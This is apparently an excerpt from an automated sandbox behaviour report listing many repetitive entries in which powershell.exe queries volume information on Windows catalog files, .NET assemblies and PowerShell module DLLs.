                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
